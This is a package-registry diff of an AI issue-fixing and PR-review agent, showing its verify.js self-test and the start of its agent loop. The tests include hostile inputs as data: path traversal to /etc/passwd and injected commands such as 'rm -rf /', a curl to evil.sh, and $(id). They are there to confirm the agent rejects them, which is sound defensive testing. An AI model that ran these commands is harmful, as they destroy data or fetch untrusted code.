@aarushpandey/gitagent 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (36) hide show
  1. package/CONTRIBUTING.md +104 -0
  2. package/LICENSE +21 -0
  3. package/README.md +570 -0
  4. package/TESTING.md +290 -0
  5. package/action.yml +113 -0
  6. package/examples/README.md +124 -0
  7. package/examples/sample-audit-trail-issue-4.md +112 -0
  8. package/examples/sample-review-tqec-pr894-v1-raw-flawed.md +71 -0
  9. package/examples/sample-review-tqec-pr894-v2-raw.md +48 -0
  10. package/examples/sample-review-tqec-pr894-v3-curated.md +118 -0
  11. package/examples/verify-marker-precedence/README.md +97 -0
  12. package/examples/verify-marker-precedence/conftest.py +15 -0
  13. package/examples/verify-marker-precedence/pyproject.toml +8 -0
  14. package/examples/verify-marker-precedence/test_marker_precedence.py +56 -0
  15. package/examples/verify-marker-precedence/verify_precedence.py +67 -0
  16. package/examples/workflows/issue-fix.yml +32 -0
  17. package/examples/workflows/pr-review.yml +34 -0
  18. package/package.json +75 -0
  19. package/scripts/verify.js +478 -0
  20. package/src/agents/agentLoop.js +176 -0
  21. package/src/agents/engineeringAgent.js +51 -0
  22. package/src/agents/reviewCopilot.js +79 -0
  23. package/src/agents/tools.js +486 -0
  24. package/src/cli/output.js +137 -0
  25. package/src/config.js +22 -0
  26. package/src/mapper/fileRelevance.js +113 -0
  27. package/src/mapper/repoMap.js +105 -0
  28. package/src/orchestrator.js +336 -0
  29. package/src/pipeline.js +985 -0
  30. package/src/prompts/engineering.js +189 -0
  31. package/src/prompts/review.js +149 -0
  32. package/src/utils/cost.js +47 -0
  33. package/src/utils/diffLines.js +67 -0
  34. package/src/utils/githubUrl.js +8 -0
  35. package/src/web/public/index.html +128 -0
  36. package/src/web/server.js +51 -0
@@ -0,0 +1,478 @@
1
+ #!/usr/bin/env node
2
+ // End-to-end live verification of every shipped feature.
3
+ // No Anthropic API calls, no GitHub access — just exercises every code path
4
+ // against synthetic temp directories so you can see the real behavior.
5
+
6
+ const fs = require('fs');
7
+ const os = require('os');
8
+ const path = require('path');
9
+
10
+ const ROOT = path.resolve(__dirname, '..');
11
+ process.chdir(ROOT);
12
+
13
// ANSI escape sequences used to colour and style the terminal output.
const C = {
  reset: '\x1b[0m',
  dim: '\x1b[2m',
  bold: '\x1b[1m',
  green: '\x1b[32m',
  red: '\x1b[31m',
  yellow: '\x1b[33m',
  blue: '\x1b[34m',
  cyan: '\x1b[36m',
  magenta: '\x1b[35m'
};

// Running tallies of checks that passed and failed during this run.
let passes = 0;
let fails = 0;
19
+
20
/**
 * Print a bold cyan banner that introduces a group of checks.
 * @param {string} title - Heading text shown between the rule marks.
 */
function section(title) {
  const banner = `\n${C.bold}${C.cyan}━━ ${title} ━━${C.reset}`;
  console.log(banner);
}
23
/**
 * Record one passing check and print it with a green tick.
 * @param {string} msg - Label of the check that passed.
 */
function pass(msg) {
  passes += 1;
  const line = `${C.green} ✓${C.reset} ${msg}`;
  console.log(line);
}
27
/**
 * Record one failing check and print it in red, followed by an optional
 * detail line.
 * @param {string} msg - Label of the check that failed.
 * @param {string} [detail] - Extra context; omitted from the output when falsy.
 */
function fail(msg, detail) {
  fails += 1;
  let line = `${C.red} ✗ ${msg}${C.reset}`;
  if (detail) {
    line += `\n ${detail}`;
  }
  console.log(line);
}
31
/**
 * Print a dimmed informational line; it does not affect the pass/fail tallies.
 * @param {string} msg - Text to print.
 */
function info(msg) {
  const line = `${C.dim} ${msg}${C.reset}`;
  console.log(line);
}
34
/**
 * Report a single expectation: a truthy `ok` counts as a pass, anything
 * else as a failure.
 * @param {string} label - Description of the expectation.
 * @param {*} ok - Outcome of the expectation; judged by truthiness.
 * @param {string} [detail] - Extra context forwarded to fail() on failure.
 */
function check(label, ok, detail) {
  if (!ok) {
    fail(label, detail);
    return;
  }
  pass(label);
}
37
+
38
/**
 * Create a fresh, uniquely named directory under the OS temp directory.
 * @param {string} [prefix='verify-'] - Leading part of the directory name.
 * @returns {string} Path of the directory that was created.
 */
function mkTmp(prefix = 'verify-') {
  const template = path.join(os.tmpdir(), prefix);
  return fs.mkdtempSync(template);
}
41
/**
 * Best-effort recursive delete of a directory tree.
 * Errors are ignored on purpose: cleanup must never fail the run.
 * @param {string} dir - Path to remove.
 */
function rm(dir) {
  const removeOptions = { recursive: true, force: true };
  try {
    fs.rmSync(dir, removeOptions);
  } catch {
    // Intentionally ignored — see the note above.
  }
}
44
+
45
+ // ---------------------------------------------------------------------------
46
/**
 * Run every verification section in order, print the pass/fail summary and
 * exit with status 1 when at least one check failed.
 *
 * Every temp directory created during the run is removed in a `finally`
 * block, so an exception part-way through does not leave directories behind.
 *
 * @returns {Promise<void>}
 */
async function main() {
  const tempDirs = [];
  // Same as mkTmp(), but remembers the directory for the final sweep.
  const makeTmp = (prefix) => {
    const dir = mkTmp(prefix);
    tempDirs.push(dir);
    return dir;
  };

  try {
    await runAllChecks(makeTmp);
  } finally {
    // rm() is best-effort and tolerates directories that are already gone.
    for (const dir of tempDirs) rm(dir);
  }

  console.log(`\n${C.bold}━━ Summary ━━${C.reset}`);
  console.log(`${C.green} passed: ${passes}${C.reset}`);
  console.log(` failed: ${fails === 0 ? C.green : C.red}${fails}${C.reset}`);
  if (fails > 0) process.exit(1);
}

/**
 * Connect to the dashboard's /events endpoint and check that it answers with
 * an event stream that replays the previously buffered `verify_test` event.
 * Resolves exactly once: on the event, on a connection error, or after 1s.
 *
 * @param {number} port - Port the dashboard server is listening on.
 * @returns {Promise<void>}
 */
function probeEventStream(port) {
  const http = require('http');
  return new Promise((resolve) => {
    let timer = null;
    let settled = false;
    let req = null;
    // Single exit path: stop the timer, drop the connection, resolve once.
    const settle = () => {
      if (settled) return;
      settled = true;
      clearTimeout(timer);
      if (req) req.destroy();
      resolve();
    };

    req = http.get(`http://127.0.0.1:${port}/events`, (res) => {
      check('GET /events returns 200', res.statusCode === 200);
      check('Content-Type is text/event-stream',
        /text\/event-stream/.test(res.headers['content-type'] || ''));
      let received = '';
      res.on('data', (chunk) => {
        received += chunk.toString('utf8');
        if (!settled && received.includes('verify_test')) {
          check('SSE replays buffered events to new subscriber', true);
          settle();
        }
      });
      timer = setTimeout(() => {
        if (!settled) {
          check('SSE replays buffered events to new subscriber', false, 'no event received in 1s');
        }
        settle();
      }, 1000);
    });
    req.on('error', () => {
      // Errors after we already finished are not a connection failure.
      if (settled) return;
      check('SSE connection succeeds', false);
      settle();
    });
  });
}

/**
 * Execute verification sections 1–19 against synthetic temp directories.
 *
 * @param {(prefix: string) => string} makeTmp - Creates a temp directory and
 *   registers it with the caller for cleanup.
 * @returns {Promise<void>}
 */
async function runAllChecks(makeTmp) {
  section('1. Module exports — pipeline can be required without auto-running');
  const pipeline = require('../src/pipeline');
  check('exports.buildAuditTrail is a function', typeof pipeline.buildAuditTrail === 'function');
  check('exports.buildPrBody is a function', typeof pipeline.buildPrBody === 'function');
  check('exports.runIssue is a function', typeof pipeline.runIssue === 'function');

  section('2. Path traversal — safeJoin blocks escape attempts');
  const { safeJoin, parseTestCommand, parseLintCommand, dispatchTool } = require('../src/agents/tools');
  const tmpRepo = makeTmp('repo-');
  fs.writeFileSync(path.join(tmpRepo, 'inside.txt'), 'ok');
  check('inside-repo path resolves',
    safeJoin(tmpRepo, 'inside.txt') === path.resolve(tmpRepo, 'inside.txt'));
  let threw = false;
  try { safeJoin(tmpRepo, '../../etc/passwd'); } catch { threw = true; }
  check('../../etc/passwd is rejected', threw);
  threw = false;
  try { safeJoin(tmpRepo, '/etc/passwd'); } catch { threw = true; }
  check('/etc/passwd is rejected', threw);

  section('3. Shell injection — parseTestCommand / parseLintCommand');
  for (const dangerous of ['npm test; rm -rf /', 'npm test && curl evil.sh', 'npm test `whoami`', 'npm test $(id)']) {
    const parsed = parseTestCommand(dangerous);
    check(`rejects: ${dangerous}`, parsed.error && /metacharacter/.test(parsed.error));
  }
  check('accepts: npm run test -- --watchAll=false',
    !parseTestCommand('npm run test -- --watchAll=false').error);
  check('accepts: pytest tests/ -v',
    !parseTestCommand('pytest tests/ -v').error);
  check('accepts: tox',
    !parseTestCommand('tox').error);
  check('accepts: nox',
    !parseTestCommand('nox').error);
  check('accepts: make test',
    !parseTestCommand('make test').error);
  check('lint: ruff check . accepted',
    !parseLintCommand('ruff check .').error);
  check('lint: black --check . accepted',
    !parseLintCommand('black --check .').error);
  check('lint: mypy . accepted',
    !parseLintCommand('mypy .').error);
  check('lint: eslint . accepted',
    !parseLintCommand('eslint .').error);
  check('lint: rm -rf / rejected',
    /allowlist/.test(parseLintCommand('rm -rf /').error || ''));

  section('4. write_file overwrite safety');
  fs.writeFileSync(path.join(tmpRepo, 'existing.js'), 'old');
  let r = await dispatchTool('write_file',
    { path: 'existing.js', content: 'NEW' },
    { repoPath: tmpRepo });
  check('refuses to overwrite without overwrite:true', !r.ok && /already exists/.test(r.error));
  r = await dispatchTool('write_file',
    { path: 'existing.js', content: 'NEW', overwrite: true },
    { repoPath: tmpRepo });
  check('overwrites when overwrite:true is passed', r.ok && r.overwrote === true);
  r = await dispatchTool('write_file',
    { path: 'newfile.js', content: 'hi' },
    { repoPath: tmpRepo });
  check('creates new files without overwrite flag', r.ok && r.overwrote === false);

  section('5. apply_patch fallback strategies');
  // Exact match
  fs.writeFileSync(path.join(tmpRepo, 'p1.js'), 'const x = 1;\n');
  r = await dispatchTool('apply_patch',
    { path: 'p1.js', old_string: 'const x = 1;', new_string: 'const x = 42;' },
    { repoPath: tmpRepo });
  check('exact match patches', r.ok && /exact match/.test(r.message));

  // Whitespace-normalized: file uses tabs, agent sends spaces
  fs.writeFileSync(path.join(tmpRepo, 'p2.py'), 'def foo():\n\treturn\t\t1\n');
  r = await dispatchTool('apply_patch',
    { path: 'p2.py', old_string: 'def foo():\n return 1', new_string: 'def foo():\n return 2' },
    { repoPath: tmpRepo });
  check('whitespace-normalized fallback succeeds on tabs-vs-spaces drift',
    r.ok && /whitespace-normalized/.test(r.message));
  info(`patched file now: ${JSON.stringify(fs.readFileSync(path.join(tmpRepo, 'p2.py'), 'utf8'))}`);

  // Closest-line hint on miss
  fs.writeFileSync(path.join(tmpRepo, 'p3.js'),
    'const a = 1;\nconst actually_relevant_thing = 3;\nconst b = 2;\n');
  r = await dispatchTool('apply_patch',
    { path: 'p3.js', old_string: 'const totally_not_there = 3;', new_string: 'X' },
    { repoPath: tmpRepo });
  check('miss returns descriptive error', !r.ok && /not found/.test(r.error));

  section('6. apply_patch_range — line-based edits');
  fs.writeFileSync(path.join(tmpRepo, 'lines.txt'), 'A\nB\nC\nD\n');
  r = await dispatchTool('apply_patch_range',
    { path: 'lines.txt', start_line: 2, end_line: 3, new_content: 'X\nY\nZ' },
    { repoPath: tmpRepo });
  const after = fs.readFileSync(path.join(tmpRepo, 'lines.txt'), 'utf8');
  check('replaces lines 2..3 correctly', r.ok && after === 'A\nX\nY\nZ\nD\n');
  info(`file now: ${JSON.stringify(after)}`);
  r = await dispatchTool('apply_patch_range',
    { path: 'lines.txt', start_line: 1, end_line: 99, new_content: 'X' },
    { repoPath: tmpRepo });
  check('rejects out-of-range line numbers', !r.ok && /Invalid range/.test(r.error));

  section('7. give_up tool — graceful escape hatch');
  r = await dispatchTool('give_up', {
    reason: 'too_complex',
    explanation: 'Would need changes across 8 files including a C extension.',
    blockers: ['no test environment', 'unfamiliar Cython internals']
  }, { repoPath: tmpRepo });
  check('returns gave_up:true with structured reason',
    r.ok && r.gave_up === true && r.reason === 'too_complex');
  // Guarded so a missing field is reported as a failed check, not a crash.
  check('preserves explanation',
    typeof r.explanation === 'string' && r.explanation.includes('8 files'));
  check('preserves blockers list', Array.isArray(r.blockers) && r.blockers.length === 2);
  info(`reason: ${r.reason} · blockers: ${Array.isArray(r.blockers) ? r.blockers.length : 0}`);

  section('8. find_relevant_files — keyword scorer');
  const ranked = await dispatchTool('find_relevant_files',
    { query: 'login email uppercase bug', top_k: 5 },
    { repoPath: tmpRepo });
  // tmpRepo doesn't have login files, so ranked will be empty — that's fine
  check('returns ok with candidates array', ranked.ok && Array.isArray(ranked.candidates));

  // Now with a more realistic repo
  const relRepo = makeTmp('rel-');
  fs.mkdirSync(path.join(relRepo, 'src', 'auth'), { recursive: true });
  fs.writeFileSync(path.join(relRepo, 'src', 'auth', 'login.py'),
    'def login(email, password):\n return email.lower()\n');
  fs.writeFileSync(path.join(relRepo, 'src', 'app.py'),
    'from .auth.login import login\n');
  fs.writeFileSync(path.join(relRepo, 'src', 'unrelated.py'),
    'def compute_fft():\n pass\n');
  const ranked2 = await dispatchTool('find_relevant_files',
    { query: 'Login fails when email is uppercase', top_k: 3 },
    { repoPath: relRepo });
  const ranked2Candidates = Array.isArray(ranked2.candidates) ? ranked2.candidates : [];
  check('ranks login.py first for an issue about login + email',
    ranked2.ok && ranked2Candidates[0] &&
    ranked2Candidates[0].path === 'src/auth/login.py');
  info(`top-3: ${ranked2Candidates.map(c => `${c.path}(${c.score})`).join(', ')}`);
  rm(relRepo);

  section('9. Big-project file walker — extensions, ignore-dirs, truncation');
  const { buildRepoMap } = require('../src/mapper/repoMap');
  const bigRepo = makeTmp('big-');
  fs.mkdirSync(path.join(bigRepo, 'src'), { recursive: true });
  for (const ext of ['py', 'pyx', 'pxd', 'pyi', 'rs', 'go', 'java', 'toml', 'md', 'rst']) {
    fs.writeFileSync(path.join(bigRepo, 'src', `f.${ext}`), '// stub');
  }
  fs.writeFileSync(path.join(bigRepo, 'Makefile'), 'test:\n\tpytest\n');
  fs.writeFileSync(path.join(bigRepo, 'tox.ini'), '[tox]');
  // big-project artefact dirs that must be ignored
  for (const ignored of ['node_modules', 'target', 'vendor', '.mypy_cache', '.pytest_cache', '.tox', '_build', 'site']) {
    fs.mkdirSync(path.join(bigRepo, ignored));
    fs.writeFileSync(path.join(bigRepo, ignored, 'junk.py'), 'noise');
  }
  const walked = buildRepoMap(bigRepo);
  check('walks .pyx', walked.files.includes('src/f.pyx'));
  check('walks .pxd', walked.files.includes('src/f.pxd'));
  check('walks .pyi', walked.files.includes('src/f.pyi'));
  check('walks .rs', walked.files.includes('src/f.rs'));
  check('walks .toml/.md/.rst (config + docs)',
    walked.files.includes('src/f.toml') &&
    walked.files.includes('src/f.md') &&
    walked.files.includes('src/f.rst'));
  check('recognises Makefile', walked.files.includes('Makefile'));
  check('recognises tox.ini', walked.files.includes('tox.ini'));
  check('skips node_modules/target/vendor/.mypy_cache/.pytest_cache/.tox/_build/site',
    !walked.files.some(f => /node_modules|target|vendor|mypy_cache|pytest_cache|\.tox|_build|site/.test(f)));
  info(`walked ${walked.total} files; truncated=${walked.truncated}`);

  // truncation
  for (let i = 0; i < 50; i++) fs.writeFileSync(path.join(bigRepo, `extra-${i}.py`), '');
  const small = buildRepoMap(bigRepo, { maxFiles: 5 });
  check('truncated:true with cap',
    small.truncated && small.cap === 5 && small.files.length === 5);
  info(`returned ${small.files.length} of ${small.total} (truncated=${small.truncated})`);
  rm(bigRepo);

  section('10. Test command detection — Makefile/tox/nox/npm/pytest/etc.');
  const {
    detectTestCommand, detectLintCommands,
    detectSubPackages, guessSubPackageForIssue,
    readContributionGuidelines,
    extractVerdict
  } = require('../src/orchestrator');

  const cases = [
    { setup: { 'Makefile': 'test:\n\tpytest\n' }, expect: 'make test' },
    { setup: { 'tox.ini': '[tox]', 'pyproject.toml': '[tool.pytest]' }, expect: 'tox' },
    { setup: { 'noxfile.py': 'import nox', 'pyproject.toml': '[tool.pytest]' }, expect: 'nox' },
    { setup: { 'package.json': '{"scripts":{"test":"jest"}}' }, expect: 'npm test' },
    { setup: { 'pyproject.toml': '[tool.pytest]' }, expect: 'pytest' },
    { setup: { 'go.mod': 'module x' }, expect: 'go test ./...' },
    { setup: { 'Cargo.toml': '[package]' }, expect: 'cargo test' },
    { setup: {}, expect: 'npm test' /* fallback */ },
  ];
  for (const c of cases) {
    const t = makeTmp('det-');
    for (const [name, content] of Object.entries(c.setup)) {
      fs.writeFileSync(path.join(t, name), content);
    }
    const got = detectTestCommand(t);
    check(`${JSON.stringify(c.setup)} → ${c.expect}`, got === c.expect, `got: ${got}`);
    rm(t);
  }

  section('11. Lint command detection — ruff/black/mypy/eslint');
  const lintCases = [
    { setup: { 'pyproject.toml': '[tool.ruff]\n[tool.black]\n[tool.mypy]\n' },
      expects: ['ruff check .', 'black --check .', 'mypy .'] },
    { setup: { '.eslintrc.json': '{}', '.prettierrc': '{}' },
      expects: ['eslint .', 'prettier --check .'] },
    { setup: {}, expects: [] }
  ];
  for (const c of lintCases) {
    const t = makeTmp('lint-');
    for (const [name, content] of Object.entries(c.setup)) {
      fs.writeFileSync(path.join(t, name), content);
    }
    const got = detectLintCommands(t);
    const allFound = c.expects.every(e => got.includes(e));
    check(`${JSON.stringify(c.setup)} → ${JSON.stringify(c.expects)}`,
      got.length === c.expects.length && allFound, `got: ${JSON.stringify(got)}`);
    rm(t);
  }

  section('12. Monorepo subpackage detection (Qiskit-style)');
  const mono = makeTmp('mono-');
  for (const sub of ['qiskit-terra', 'qiskit-aer', 'qiskit-ibmq']) {
    fs.mkdirSync(path.join(mono, sub));
    fs.writeFileSync(path.join(mono, sub, 'pyproject.toml'), '[project]');
  }
  const subs = detectSubPackages(mono);
  check('detects all 3 subpackages', subs.length === 3);
  check('classified as python', subs.every(s => s.kind === 'python'));
  info(`subs: ${subs.map(s => s.name).join(', ')}`);
  const guess = guessSubPackageForIssue(subs, 'Transpiler in terra breaks empty circuits');
  check('guesses qiskit-terra for a terra-flavored issue',
    guess && guess.name === 'qiskit-terra');
  info(`guessed: ${guess && guess.name}`);
  const noGuess = guessSubPackageForIssue(subs, 'completely unrelated text');
  check('returns null when nothing matches', noGuess === null);
  rm(mono);

  section('13. CONTRIBUTING.md / PR template / DCO detection');
  const contribRepo = makeTmp('cg-');
  fs.writeFileSync(path.join(contribRepo, 'CONTRIBUTING.md'),
    'All contributions must be Signed-off-by per the Developer Certificate of Origin.');
  fs.mkdirSync(path.join(contribRepo, '.github'));
  fs.writeFileSync(path.join(contribRepo, '.github', 'PULL_REQUEST_TEMPLATE.md'),
    '## Checklist\n- [ ] Tests added\n- [ ] Docs updated');
  const cg = readContributionGuidelines(contribRepo);
  check('reads CONTRIBUTING.md', cg.contributing && cg.contributing.path === 'CONTRIBUTING.md');
  check('reads PR template', cg.prTemplate && /Checklist/.test(cg.prTemplate.text));
  check('detects DCO from CONTRIBUTING text', cg.requiresDco === true);
  rm(contribRepo);

  // DCO from .github/dco.yml
  const dcoRepo = makeTmp('dco-');
  fs.mkdirSync(path.join(dcoRepo, '.github'));
  fs.writeFileSync(path.join(dcoRepo, '.github', 'dco.yml'), 'require: true');
  check('detects DCO from .github/dco.yml',
    readContributionGuidelines(dcoRepo).requiresDco === true);
  rm(dcoRepo);

  section('14. Verdict extraction');
  check('APPROVE → APPROVE', extractVerdict('## Verdict\n**APPROVE**\n') === 'APPROVE');
  check('REQUEST_CHANGES → REQUEST_CHANGES',
    extractVerdict('Final: REQUEST_CHANGES — see notes.') === 'REQUEST_CHANGES');
  check('NEEDS_DISCUSSION → NEEDS_DISCUSSION',
    extractVerdict('verdict: NEEDS_DISCUSSION') === 'NEEDS_DISCUSSION');
  check('unparseable → UNKNOWN', extractVerdict('idk lol') === 'UNKNOWN');

  section('15. Cost math — input/output/cache_read/cache_creation');
  const { computeCost } = require('../src/utils/cost');
  const { COST_INPUT_PER_MTOK, COST_OUTPUT_PER_MTOK,
    COST_CACHE_READ_PER_MTOK, COST_CACHE_CREATION_PER_MTOK } = require('../src/config');
  info(`config: $${COST_INPUT_PER_MTOK}/in $${COST_OUTPUT_PER_MTOK}/out $${COST_CACHE_READ_PER_MTOK}/cache-read $${COST_CACHE_CREATION_PER_MTOK}/cache-create`);
  const cost = computeCost({
    input_tokens: 1_000_000, output_tokens: 1_000_000,
    cache_read_input_tokens: 1_000_000, cache_creation_input_tokens: 1_000_000
  });
  const expected = COST_INPUT_PER_MTOK + COST_OUTPUT_PER_MTOK + COST_CACHE_READ_PER_MTOK + COST_CACHE_CREATION_PER_MTOK;
  check(`computeCost includes cache_creation (${cost.total_usd.toFixed(4)} == ${expected.toFixed(4)})`,
    Math.abs(cost.total_usd - expected) < 0.001);

  section('16. Audit trail — human-readable rendering');
  const { buildAuditTrail, buildPrBody } = pipeline;
  const fakeIssue = { number: 42, title: 'fix login', html_url: 'https://github.com/x/y/issues/42' };
  const fakeUsage = {
    input_tokens: 100, output_tokens: 50,
    cache_read_input_tokens: 0, cache_creation_input_tokens: 0
  };
  const fakeEng = {
    history: [
      { turn: 1, kind: 'thought', text: 'Looking at auth module' },
      { turn: 1, kind: 'tool', name: 'read_file', input: { path: 'src/auth/login.js' }, result: { ok: true } },
      { turn: 2, kind: 'tool', name: 'apply_patch', input: { path: 'src/auth/login.js' }, result: { ok: true } },
      { turn: 3, kind: 'tool', name: 'run_tests', input: { command: 'npm test' }, result: { ok: true, passed: true, attempts: 1 } },
      { turn: 4, kind: 'tool', name: 'run_lint', input: { command: 'eslint .' }, result: { ok: true, passed: true } }
    ],
    finalSummary: 'Lowercased email before lookup.',
    sawPassingTests: true, sawPassingLint: true,
    completedTurns: 5, gaveUp: null
  };
  const audit = buildAuditTrail({
    issue: fakeIssue, branch: 'fix/issue-42',
    engineering: fakeEng, review: '## Verdict\n**APPROVE**\n',
    revision: null, totalUsage: fakeUsage, preFixSha: 'abc1234'
  });
  check('audit has Outcome section with FINISHED', /## Outcome\s+\n+✅ \*\*Finished\*\*/.test(audit));
  check('audit has Safety gates section', /## Safety gates/.test(audit));
  check('audit lists Tests observed passing: YES', /Tests observed passing: \*\*YES\*\*/.test(audit));
  check('audit lists Lint observed passing: YES', /Lint observed passing: \*\*YES\*\*/.test(audit));
  check('audit has Files touched section', /## Files touched/.test(audit) && /src\/auth\/login\.js/.test(audit));
  check('audit has Test runs section with counts', /## Test runs/.test(audit) && /Total invocations: 1/.test(audit));
  check('audit has Timeline (condensed)', /## Timeline \(condensed\)/.test(audit));
  check('audit has Full transcript collapsed in <details>', /<details>/.test(audit) && /## Full tool transcript/.test(audit));
  check('audit shows pre-fix SHA + revert command', /abc1234/.test(audit) && /git reset --hard abc1234/.test(audit));

  // GAVE UP variant
  const gaveUpEng = {
    ...fakeEng, finalSummary: null, sawPassingTests: false, sawPassingLint: null,
    gaveUp: { reason: 'too_complex', explanation: 'Would need 8 files changed.', blockers: ['no test env'] }
  };
  const audit2 = buildAuditTrail({
    issue: fakeIssue, branch: 'fix/issue-42',
    engineering: gaveUpEng, review: null, revision: null,
    totalUsage: fakeUsage, preFixSha: 'abc1234'
  });
  check('audit renders ❌ Gave up with reason', /❌ \*\*Gave up\*\* — `too_complex`/.test(audit2));
  check('audit lists blockers when given up', /- no test env/.test(audit2));

  section('17. PR body — Resolves + summary + review block + template');
  const body = buildPrBody({
    issue: fakeIssue, engineering: fakeEng,
    review: '## Verdict\n**APPROVE**\nLooks good.',
    revision: null
  });
  check('PR body contains "Resolves #42"', /Resolves #42/.test(body));
  check('PR body contains the engineering summary', /Lowercased email/.test(body));
  check('PR body collapses review in <details>', /<details><summary>Click to expand<\/summary>/.test(body));

  const bodyWithTemplate = buildPrBody({
    issue: fakeIssue, engineering: fakeEng,
    review: '## Verdict\n**APPROVE**\n',
    revision: null,
    prTemplate: { path: '.github/PULL_REQUEST_TEMPLATE.md', text: '## Checklist\n- [ ] Tests added' }
  });
  check('PR template appears at top when provided',
    bodyWithTemplate.indexOf('## Checklist') < bodyWithTemplate.indexOf('Resolves #42'));

  section('18. CLI — usage prints when invoked with no args');
  const { execSync } = require('child_process');
  let helpOut = '';
  try {
    helpOut = execSync('node src/pipeline.js', { encoding: 'utf8' });
  } catch (e) {
    // process.exit(1) when no args — that's intentional, capture stdout
    helpOut = (e.stdout || '') + (e.stderr || '');
  }
  check('usage shows issue/review/triage subcommands',
    /Usage:/.test(helpOut) && /issue/.test(helpOut) && /review/.test(helpOut) && /triage/.test(helpOut));
  check('usage lists --fork / --comment / --post / --force-pr / --web / --max-cost',
    /--fork/.test(helpOut) && /--comment/.test(helpOut) && /--post/.test(helpOut) &&
    /--force-pr/.test(helpOut) && /--web/.test(helpOut) && /--max-cost/.test(helpOut));

  section('19. Web dashboard — server starts + serves /events');
  const { createDashboard } = require('../src/web/server');
  const dash = createDashboard();
  const server = await dash.start(0); // 0 = random free port
  try {
    const port = server.address().port;
    info(`dashboard listening on port ${port}`);
    // Push an event before connecting — buffer should replay it.
    dash.pushEvent({ stage: 'verify_test', message: 'hello from verify.js' });
    // Hit /events with a quick HTTP request and check the SSE format.
    await probeEventStream(port);
  } finally {
    // Stop listening even when a check above throws.
    server.close();
  }

  rm(tmpRepo);
}
474
+
475
// Start the run. An unexpected exception is reported and exits with status 2.
main().catch((err) => {
  const banner = `${C.red}verify.js crashed:${C.reset}`;
  console.error(banner, err);
  process.exit(2);
});
@@ -0,0 +1,176 @@
1
+ const Anthropic = require('@anthropic-ai/sdk');
2
+ const { TOOLS, dispatchTool } = require('./tools');
3
+ const { MODEL, MAX_AGENT_ITERATIONS, MAX_TURN_OUTPUT_TOKENS } = require('../config');
4
+ const { emptyUsage, addUsage, computeCost } = require('../utils/cost');
5
+
6
/**
 * Build a short one-line preview of a tool input for event logs.
 *
 * The preview is the JSON form of `input`, cut to at most 140 characters
 * (137 characters plus `...` when it is longer). Inputs that JSON cannot
 * represent never throw: values for which `JSON.stringify` yields no string
 * (undefined, functions, symbols) fall back to `String(input)`, and values
 * that make it throw (circular structures, BigInt) produce a fixed
 * placeholder.
 *
 * @param {*} input - Tool input to preview.
 * @returns {string} Preview text, never longer than 140 characters.
 */
function previewInput(input) {
  let json;
  try {
    json = JSON.stringify(input);
  } catch (err) {
    return '[unserializable input]';
  }
  // JSON.stringify returns undefined, not a string, for undefined/functions/symbols.
  const text = typeof json === 'string' ? json : String(input);
  if (text.length <= 140) return text;
  return text.slice(0, 137) + '...';
}
11
+
12
// Network-level error codes that are treated as transient.
const RETRYABLE_NETWORK_CODES = new Set([
  'ECONNRESET', 'ETIMEDOUT', 'EAI_AGAIN', 'ECONNREFUSED', 'ENETUNREACH', 'EPIPE'
]);

/**
 * Decide whether a failed call is worth retrying.
 *
 * Retryable means: HTTP status 429 or any 5xx (which includes 529), read
 * from `err.status` or `err.response.status`; or a network error code from
 * RETRYABLE_NETWORK_CODES found on the error itself or on any error in its
 * `cause` chain. The chain is followed because wrappers can nest the
 * original network error more than one level deep.
 *
 * @param {*} err - The thrown value.
 * @returns {boolean} True when the failure looks transient.
 */
function isRetryable(err) {
  if (!err) return false;

  const status = err.status || (err.response && err.response.status);
  if (status === 429 || (status >= 500 && status < 600)) return true;

  // Bounded walk so a self-referencing `cause` cannot loop forever.
  let link = err;
  for (let depth = 0; link && depth < 5; depth++) {
    if (link.code && RETRYABLE_NETWORK_CODES.has(link.code)) return true;
    link = link.cause;
  }
  return false;
}
25
+
26
/**
 * Call `fn`, retrying with exponential backoff while the failure is
 * retryable according to isRetryable().
 *
 * At least one attempt is always made: a `maxAttempts` below 1 (or one that
 * is not a number) is treated as 1, so `fn` is never skipped and the
 * function never throws a meaningless `null`.
 *
 * @param {() => Promise<*>} fn - Operation to run; invoked once per attempt.
 * @param {object} [options]
 * @param {number} [options.maxAttempts=3] - Upper bound on attempts.
 * @param {number} [options.baseDelayMs=1000] - Delay before the second
 *   attempt; it doubles before each later attempt.
 * @param {function} [options.onRetry] - Called before each wait with
 *   `{ attempt, nextAttempt, delayMs, error }`.
 * @returns {Promise<*>} Whatever `fn` resolves to.
 * @throws The error from the last attempt, or the first non-retryable error.
 */
async function callWithRetry(fn, {
  maxAttempts = 3,
  baseDelayMs = 1000,
  onRetry = () => {}
} = {}) {
  const attempts = Math.max(1, Math.floor(Number(maxAttempts)) || 1);
  for (let attempt = 1; ; attempt++) {
    try {
      return await fn();
    } catch (e) {
      // Check the attempt budget first so the final failure is rethrown as is.
      if (attempt >= attempts || !isRetryable(e)) throw e;
      const delay = baseDelayMs * Math.pow(2, attempt - 1);
      onRetry({ attempt, nextAttempt: attempt + 1, delayMs: delay, error: e });
      await new Promise(r => setTimeout(r, delay));
    }
  }
}
45
+
46
/**
 * Run one tool and always come back with a result object.
 *
 * An exception from dispatchTool, or a return value that is not an object,
 * is turned into `{ ok: false, error }` so it can be sent back to the model
 * as a failed tool result instead of aborting the whole agent run.
 *
 * @param {{name: string, input: *}} call - The tool_use block to execute.
 * @param {*} ctx - Context passed through to dispatchTool.
 * @returns {Promise<object>} The tool's result, or a synthesized failure.
 */
async function dispatchToolSafely(call, ctx) {
  try {
    const result = await dispatchTool(call.name, call.input, ctx);
    if (result && typeof result === 'object') return result;
    return { ok: false, error: `Tool ${call.name} returned no result` };
  } catch (err) {
    const reason = err && err.message ? err.message : String(err);
    return { ok: false, error: `Tool ${call.name} threw: ${reason}` };
  }
}

/**
 * Drive the model/tool conversation until the agent finishes, gives up,
 * stops calling tools, exceeds the cost limit, or runs out of iterations.
 *
 * Each turn sends the conversation to the model (retrying transient API
 * failures), records any text as a `thought`, executes every requested tool
 * in order, and feeds the JSON-encoded results back as the next user message.
 *
 * @param {object} options
 * @param {string} options.systemPrompt - System prompt; sent with an
 *   ephemeral cache_control marker.
 * @param {string} options.userPrompt - First user message.
 * @param {*} options.ctx - Context handed to every tool invocation.
 * @param {number} [options.maxIterations=MAX_AGENT_ITERATIONS] - Turn budget.
 * @param {number} [options.maxTokens=MAX_TURN_OUTPUT_TOKENS] - max_tokens per call.
 * @param {?number} [options.costLimitUsd=null] - Stop once the accumulated
 *   cost exceeds this amount; `null` disables the check.
